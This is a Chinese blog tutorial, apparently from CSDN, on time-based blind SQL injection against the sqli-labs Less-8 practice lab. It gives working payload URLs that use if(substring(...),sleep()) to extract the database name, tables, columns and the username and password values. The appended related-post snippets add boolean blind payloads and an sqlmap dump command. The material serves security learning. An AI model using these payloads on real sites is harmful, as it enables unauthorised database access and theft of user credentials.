SQL注入之布尔盲注入(二)

最新推荐文章于 2024-01-03 21:12:35 发布
最新推荐文章于 2024-01-03 21:12:35 发布
阅读量238 收藏
点赞数 1
分类专栏: WEB安全 文章标签: 网络安全 WEB安全 SQL注入 SQL盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/skynet_x/article/details/102921897
版权

1.首先了解一下在SQL中if语句的用法

IF( expr1 , expr2 , expr3 )
expr1 的值为 TRUE,则返回值为 expr2 expr2
的值为FALSE,则返回值为 expr3

结合sleep()可以构成基于时间盲注的SQL语句

http://172.16.32.128/sqli-labs-master/Less-8/?id=1' and  if (substring(database(),1,1)='s',sleep(3),null) --+

在这里插入图片描述
该语句的意思为:如果数据库名的第一个字符等于字母s为真,则延时三秒后进行响应,如果为假,则不执行任何语句,这里的null可以写成任何对该语句没有影响的条件,例如写个1、2

2.修改判断位置,以此判断出数据库名的其他字符,直到整个数据库名全部取出

3.已知数据库名为security,查询数据库中的表

http://172.16.32.128/sqli-labs-master/Less-8/?id=1' and  if (substring((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)='e',sleep(3),null) --+

结合我在盲注一中讲述的内容,查出所有的表

4.已知数据库名security、数据表users,查询表中的字段

http://172.16.32.128/sqli-labs-master/Less-8/?id=1' and  if (substring((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1)='i',sleep(3),null) --+

5.已知数据库名security、数据表users,users表中username、password字段,查询字段中的内容

http://172.16.32.128/sqli-labs-master/Less-8/?id=1' and  if (substring((select group_concat(username,'^',password) from security.users),1,1)='d',sleep(3),null) --+

至此基于时间延时盲注入完成,关于密码大小写敏感的方法已经在我布尔盲注入一中提到

提示:
判断是否能使用延时注入的方法是将sleep()带入注入点,看能否被执行,执行一下语句,如果存在延时注入,页面将会延迟五秒响应

http://172.16.32.128/sqli-labs-master/Less-8/?id=1' and sleep(5) --+

在这里插入图片描述

skynet_x
关注
专栏目录
网络安全自学教程》- SQL注入布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 1万+
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
SQL注入原理及实践(一)–SQL注入布尔盲注
dulirongdudu的博客
08-02 2184
当不知道数据库返回值的情况下时【无回显】,输1’and‘1’='1和1’and‘1’='2显示不一样,仅返回正确、或者错误的页面时,存在布尔盲注。①if()if(条件,结果1,结果2)如果条件成立,则输出结果1,否则输出结果2。if(SUBSTRING(参数1,参数2,参数3),结果1.结果2)②字符串截取函数SUBSTRING(参数1,参数2,参数3)当假设长度为4时,返回正确的界面,因此数据库名为4位字符串。1’and‘1’='1为真返回正确的界面。.....................
布尔盲注演示
oxygensss的博客
12-12 1140
盲注:(简单但繁琐) 所谓盲注就是在服务器没有错误回显的时候完成注攻击,没有错误回显,对于攻击者来说就少了非常重要的调试信息 大致分为两种: 1.布尔盲注 只能返回对和错,没有了之前的报错信息 and databse() = ' ' //不断用字母进行填充 => 但是组合太多,所以要切割 substr()截取字符串 substr(str,pos,len) 1.截取的东西 2.位置 3.长度 select substr('abcdefg',1,1) 返回的内容位a and substr(
布尔盲注
qq_45300786的博客
07-12 306
@$sql = 'select *from news where id="'.$id.'"' 这里只是加了过滤,我要我们把前面的单引号闭合就可以了。再把后面的注释掉就是了。 " and 1=1 – qqq 后面的跟上一篇的布尔盲注(一)是一个思路的。
SQL注入基础 布尔盲注
hunter_76的博客
09-05 116
布尔盲注的经典例子 https://www.ichunqiu.com/battalion?t=1&r=68487 测试语句 判断库名长度 构造SQL判断语句,看页面返回结果推测哪些SQL判断条件是成立的。 这里假设数据库库名的长度为3。 返回结果分为2种,即yes,和no。 /boolean.php?id=1' and length(database())>=1--+ //页面返回结果为yes /boolean.php?id=1' and length(databas.
sql注入——布尔盲注
初学者L_言的博客
04-12 576
场景 sql-labs中的 Less-8 一、主要运用的mysql语法: count()函数:统计询结果的数量; length(str)函数:返回字符串 str的长度; left()函数: left(database(),1)='s' left(a,b)从左侧截取a的前b位,正确则返回1,错误返回0 left((select database()),1)='s' 同...
SQL注入漏洞测试(布尔盲注)
jeehoon的博客
11-13 566
首先看源代码,能找到new_list.php?id=1这个url,进里面,使用了or 1=1,发现无回显,使用SQLmap进行爆破,具体命令为 sqlmap.py-u “http://219.153.49.228:46048/new_list.php?id=1” --dump --batch 用户名是mozhe,密码经过了MD5加密,我们在线解密 输用户名密码,获得key。 ...
SQL注入之基于布尔盲注详解
09-10
布尔SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
SQL注入——布尔盲注
TGFXK的博客
03-21 319
原理:前面几关都有数据回显,而在有的界面不会回显数据,只会显示对错,此时库名等就比较难,只能根据猜对错来判断。
sql注入-布尔盲注脚本
最新发布
m0_58853680的博客
01-03 460
获取cms_users表中的username和password字段的值,并用冒号分隔(使用。USER_AGENT:模拟浏览器请求时使用的User-Agent头信息。实时打印已获取的部分数据库名,并在获取完整个名字后显示最终结果。若成功获取到长度不为None,则调用get_database_获取名为cms_users表的所有列名(同样使用group_接收一个参数content_length表示数据库名的长度。该函数利用SQL注入漏洞尝试获取数据库名或表名的长度。获取当前数据库中的所有表名(使用group_
SQL漏洞(六)布尔盲注
不秃头的程序Yang
06-11 1166
、判断盲注
SQL注入-05】布尔盲注案例
m0_64378913的博客
04-26 1823
目录1 概述2 操作环境3 操作具体步骤3.1 判断是否存在注点及注的类型3.2 测试数据库库名长度3.3 逐个测试数据库库名的字符3.4 测试该数据库中所有表名3.5 测试users表中的所有字段名3.6 测试敏感字段的字段内容4 总结参考文章 1 概述 当改变浏览器传给后台SQL的参数后,浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合询注与报错注,这时候可以试试看能否使用布尔。具体参考《【SQL注入-02】SQL注入点的简单判断》。 布尔盲注:一般情况下,当带参数为真
sql注入布尔盲注、延时盲注以及原理
maluxiao123的博客
03-30 1271
之前已经简单介绍了sql注入的基本原理,接下来会按照sql注入的各种类型一一进行梳理,sql注入的常见主要分为回显注、报错注、bool盲注、延时注、堆叠注次注、宽字节注、http头注、DNS LOAD注。 1.布尔盲注 我们知道页面有回显可以确定回显位时可以进行回显注,而没有回显的话,有sql报错页面可以使用报错注,而一般设计完善的网站是会将sql报错的内容给屏蔽掉的。但是我们能判断页面是报错了,就算页面没有报错内容我们同样是有办法的,这时候我们可以使用盲注的方式来进行注。 比如
布尔盲注
printfzfy的博客
12-07 270
打开靶场 点击访问 工具用sqlmap,一般kali虚拟机自带 1:在命令行里输sqlmap -u 注点 --current-db 点回车键会出现 数据库名是 stormgroup 只有出现这个数据库才可执行下个命令 sqlmap -u 注点-D 获取到的数据名 --tables 会有member和notice 就是下图 3: 获取完之后sqlmap -u 注点 -D 获取到的数据库...
数据库中所有列名
xianrenyingzi的专栏
12-14 4773
如何从整个数据库所有表中找出一个列名?比如想要找一个名为"name"的列名,但是忘记了这一列是在那一个表中,需要从整个数据库的所有表中进行询。 Oracle 数据库: select * from user_col_comments s where s.column_name like 'NAME%'; MySQL数据库: SELECT * FROM information_schema.COLUMNS WHERE column_name like 'NAME%'; SqlServer数据库
mysql语句%3e= %3c=_SQLI
weixin_30189559的博客
01-20 536
开源项目https://github.com/payloadbox/sql-injection-payload-list站库分离判断MSSQLselect host_name(); --客户端主机名select @@servername; --服务端主机名数据库判断ACCESS和SQLServer[Host]?[par]=[Num] and (select count(*) from sysob...
sql注入--布尔盲注
pakho_C的博客
01-02 1338
sql注入布尔盲注 靶场:sqli-labs-master 下载链接:靶场下载链接 第8关 盲注 php源码 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id'])) { $id=$_GET['id']; //logging the conn
SQL注入-盲注布尔盲注与时间盲注
热门推荐
LJH1999ZN的博客
02-10 1万+
一、什么是盲注 盲注就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入盲注的分类 基于布尔类型的盲注 基于时间类型的盲注 三、利用盲注
SQL 布尔盲注的原理与注攻击
chen_zhangkonzhe的博客
09-12 1469
布尔型注,一般在测试中不会在页面显示数据库信息,只会提示对与错的内容。代码的过程:get接收id参数-》id带询-》如果存在值返回id exists字符串信息。例如:在某个系统登录页面输账号密码时提示对与错,要是存在注就是SQL盲注盲注有两种方式:一种是布尔型忙注,另外一种是延时注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值